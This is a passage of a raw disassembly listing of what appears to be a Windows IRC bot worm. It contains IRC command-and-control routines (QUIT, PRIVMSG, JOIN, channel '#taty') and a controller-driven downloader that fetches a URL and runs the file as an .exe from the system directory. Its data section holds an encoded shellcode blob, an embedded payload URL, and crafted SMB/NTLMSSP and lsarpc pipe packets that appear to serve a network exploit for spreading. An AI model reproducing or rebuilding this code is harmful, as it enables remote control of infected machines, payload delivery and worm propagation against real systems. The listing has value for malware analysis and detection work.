sub_315030B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503183 proc near ; CODE XREF: sub_315031EC+83�p
; UPX0:315035E9�p
var_14C = byte ptr -14Ch
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 14Ch
push esi
mov esi, ecx
call dword_31501124 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_31503183 endp
; =============== S U B R O U T I N E =======================================
sub_315031EC proc near ; CODE XREF: UPX0:315035D1�p
mov eax, offset loc_31503AC4
call sub_31503A98
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503227: ; CODE XREF: sub_315031EC+EF�j
call sub_31501A32
test eax, eax
jz short loc_31503274
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_31503274
call sub_31501D82
test eax, eax
jz short loc_31503258
push 1
call dword_315010E0 ; ExitThread
loc_31503258: ; CODE XREF: sub_315031EC+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503287
mov ecx, esi
call sub_31503183
loc_31503274: ; CODE XREF: sub_315031EC+42�j
; sub_315031EC+59�j ...
xor eax, eax
loc_31503276: ; CODE XREF: sub_315031EC+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503287: ; CODE XREF: sub_315031EC+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032F2
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503722
cmp eax, ebx
jnz short loc_31503274
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_31503274
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503227
; ---------------------------------------------------------------------------
loc_315032E0: ; DATA XREF: UPX0:31503B3C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032F2
retn
; ---------------------------------------------------------------------------
loc_315032F2: ; CODE XREF: sub_315031EC+B2�j
; DATA XREF: sub_315031EC+100�o
push 1
pop eax
jmp loc_31503276
sub_315031EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032FA proc near ; CODE XREF: sub_31503722+9C�p
; sub_31503722+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503329
push 1
pop eax
jmp short loc_3150336A
; ---------------------------------------------------------------------------
loc_31503329: ; CODE XREF: sub_315032FA+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_3150336A: ; CODE XREF: sub_315032FA+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503371 proc near ; CODE XREF: UPX0:31503484�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503AAA ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503AA4 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A9E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_31503371 endp
; ---------------------------------------------------------------------------
loc_31503408: ; DATA XREF: sub_31501D96+140�o
mov eax, offset loc_31503ADB
call sub_31503A98
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_315061A4, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_315061A0, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_3150345D
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_3150345D: ; CODE XREF: UPX0:31503450�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31502DA1
mov [ebp-4], ebx
loc_31503476: ; CODE XREF: UPX0:315035DD�j
; UPX0:31503603�j
push offset dword_315061A8
lea eax, [ebp-18h]
push offset dword_315061AC
push eax
call sub_31503371
add esp, 0Ch
loc_3150348C: ; CODE XREF: UPX0:315034A0�j
call sub_31501A32
test eax, eax
jnz short loc_315034A2
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_3150348C
; ---------------------------------------------------------------------------
loc_315034A2: ; CODE XREF: UPX0:31503493�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_315034BD: ; CODE XREF: UPX0:315034F9�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E14
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_31503550
inc edi
cmp edi, 8
jl short loc_315034BD
xor edi, edi
loc_315034FD: ; CODE XREF: UPX0:3150354C�j
call sub_31501A32
test eax, eax
jz short loc_3150355E
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E14[edx*4]
call sub_31502DB6
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DEC
test eax, eax
jz short loc_3150355B
inc edi
cmp edi, 4Ch
jb short loc_315034FD
jmp short loc_3150355E
; ---------------------------------------------------------------------------
loc_31503550: ; CODE XREF: UPX0:315034F3�j
push 1
pop ebx
mov ds:dword_315061A4, ebx
jmp short loc_31503567
; ---------------------------------------------------------------------------
loc_3150355B: ; CODE XREF: UPX0:31503546�j
push 1
pop ebx
loc_3150355E: ; CODE XREF: UPX0:31503504�j
; UPX0:3150354E�j
cmp ds:dword_315061A4, 0
jz short loc_31503576
loc_31503567: ; CODE XREF: UPX0:31503559�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpyA
loc_31503576: ; CODE XREF: UPX0:31503565�j
test ebx, ebx
jz short loc_315035EE
call sub_31501A32
test eax, eax
jz short loc_315035EE
loc_31503583: ; CODE XREF: UPX0:315035A8�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_315030B1
test eax, eax
jz short loc_315035AA
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_31503583
loc_315035AA: ; CODE XREF: UPX0:31503594�j
cmp ds:dword_315061A4, 0
jz short loc_315035BA
mov edx, 0A8C0h
jmp short loc_315035CA
; ---------------------------------------------------------------------------
loc_315035BA: ; CODE XREF: UPX0:315035B1�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035CA: ; CODE XREF: UPX0:315035B8�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031EC
call sub_31501A32
test eax, eax
jz loc_31503476
lea ecx, [ebp-2F4h]
call sub_31503183
loc_315035EE: ; CODE XREF: UPX0:31503578�j
; UPX0:31503581�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503476
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31503608 proc near ; CODE XREF: sub_31503722+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_31503633
push 1
jmp loc_315036C9
; ---------------------------------------------------------------------------
loc_31503633: ; CODE XREF: sub_31503608+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CF0 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_315036A9
push 2
jmp short loc_315036C9
; ---------------------------------------------------------------------------
loc_315036A9: ; CODE XREF: sub_31503608+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036CC
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036C9: ; CODE XREF: sub_31503608+26�j
; sub_31503608+9F�j
pop eax
jmp short loc_3150371D
; ---------------------------------------------------------------------------
loc_315036CC: ; CODE XREF: sub_31503608+B4�j
mov edi, 100000h
push edi
call sub_31502800
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_31502814
add esp, 0Ch
xor eax, eax
loc_3150371D: ; CODE XREF: sub_31503608+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_31503608 endp
; =============== S U B R O U T I N E =======================================
sub_31503722 proc near ; CODE XREF: sub_315031EC+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_315061AC
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_31503761
and dword ptr [esi+284h], 0
loc_31503761: ; CODE XREF: sub_31503722+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_315037C3
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_315037C3
lea eax, [esi+180h]
push eax
call sub_31503608
test eax, eax
pop ecx
jnz short loc_315037C3
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315037C3: ; CODE XREF: sub_31503722+43�j
; sub_31503722+55�j ...
test ebx, ebx
jz loc_31503A01
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 0Ah
jle loc_31503A01
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D3C
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31503A01
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
push ds:dword_315061A8
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D3C
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmpA
mov ebx, dword_31501088
test eax, eax
jnz loc_31503968
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 0FFh
jge loc_31503968
cmp dword ptr [esi+284h], 0
jnz loc_31503968
cmp dword ptr [esi+7Ch], 0
jnz loc_31503968
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503949
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A28
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503956
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503956
cmp ebp, 0E10h
jnb short loc_31503956
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503956
; ---------------------------------------------------------------------------
loc_31503949: ; CODE XREF: sub_31503722+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_31503956: ; CODE XREF: sub_31503722+1E9�j
; sub_31503722+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506124 ; "|"
push eax
call dword_3150106C ; lstrcatA
loc_31503968: ; CODE XREF: sub_31503722+15A�j
; sub_31503722+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039DE
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061CC
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506198
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506194
push ds:dword_3150615C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032FA
loc_315039DE: ; CODE XREF: sub_31503722+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039FE
cmp [esi+284h], eax
jz short loc_315039FE
push 1
pop eax
jmp short loc_31503A2A
; ---------------------------------------------------------------------------
loc_315039FE: ; CODE XREF: sub_31503722+2CD�j
; sub_31503722+2D5�j
mov byte ptr [edi], 7Ch
loc_31503A01: ; CODE XREF: sub_31503722+A3�j
; sub_31503722+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A28
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A28
call dword_31501124 ; rand
loc_31503A28: ; CODE XREF: sub_31503722+E2�j
; sub_31503722+123�j ...
xor eax, eax
loc_31503A2A: ; CODE XREF: sub_31503722+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_31503722 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A38 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A3E proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A44 proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A50 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A70
loc_31503A5C: ; CODE XREF: sub_31503A50+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A5C
loc_31503A70: ; CODE XREF: sub_31503A50+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A50 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A80: ; DATA XREF: sub_31501D96+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A86 proc near ; CODE XREF: sub_31501F6B+10C�p
; sub_31501F6B+119�p ...
jmp dword_31501118
sub_31503A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8C proc near ; CODE XREF: sub_31501F6B+35�p
jmp dword_31501114
sub_31503A8C endp
; ---------------------------------------------------------------------------
loc_31503A92: ; CODE XREF: UPX0:31503AC9�j
; UPX0:31503AE0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A98 proc near ; CODE XREF: sub_315031EC+5�p
; UPX0:3150340D�p
jmp dword ptr loc_31501108
sub_31503A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9E proc near ; CODE XREF: sub_31503371+4F�p
jmp dword_31501104
sub_31503A9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AA4 proc near ; CODE XREF: sub_31503371+34�p
jmp dword_31501100
sub_31503AA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AAA proc near ; CODE XREF: sub_31503371+1F�p
jmp dword_315010FC
sub_31503AAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB0 proc near ; CODE XREF: sub_31502490+AB�p
jmp dword_31501084
sub_31503AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503AB6 proc near ; CODE XREF: sub_31502490+64�p
jmp dword_3150107C
sub_31503AB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503ABC proc near ; CODE XREF: sub_31502490+2D�p
jmp dword_31501078
sub_31503ABC endp
; ---------------------------------------------------------------------------
align 4
loc_31503AC4: ; DATA XREF: sub_315031EC�o
mov eax, offset dword_31503AE8
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DD4
; ---------------------------------------------------------------------------
loc_31503ADB: ; DATA XREF: UPX0:loc_31503408�o
mov eax, offset dword_31503B40
jmp loc_31503A92
; ---------------------------------------------------------------------------
align 4
dword_31503AE8 dd 19930520h, 2, 31503B08h, 1, 31503B18h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AC4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B30h, 4 dup(0)
dd offset loc_315032E0
dword_31503B40 dd 19930520h, 1, 31503B60h, 5 dup(0) dd 0FFFFFFFFh, 31503AD0h, 526h dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502277+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1F1B966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C571C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B471C999h
dd 99C99998h, 0E3F367C9h, 0D11C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A20414D9h, 99C99998h
dd 9371CAC9h, 99C99998h, 61688DC9h, 0AE1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992671h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993C71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998D12Ch, 0C9C999C9h, 0C9991371h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0D12C66CBh, 99C99998h, 0AE2C66C9h
dd 99C99998h, 990C71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998AEh, 1C71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A20414h, 0C999C999h, 99EA71CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999F171h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0F0ABB7AAh, 2 dup(0C999C999h)
dd 0C5B7C999h, 0ECE9EDFFh, 0FCB7FDE9h, 0C999FCE1h, 6 dup(0C999C999h)
dd 0FCFCF5CAh, 0F2C999E9h, 0FCF7EBFCh, 99ABAAF5h, 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998D51Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FCB75A91h, 0B7FDF7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
